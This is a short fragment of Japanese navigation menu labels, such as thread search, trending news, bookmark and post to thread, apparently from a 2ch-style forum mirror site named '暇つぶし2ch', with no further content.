スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch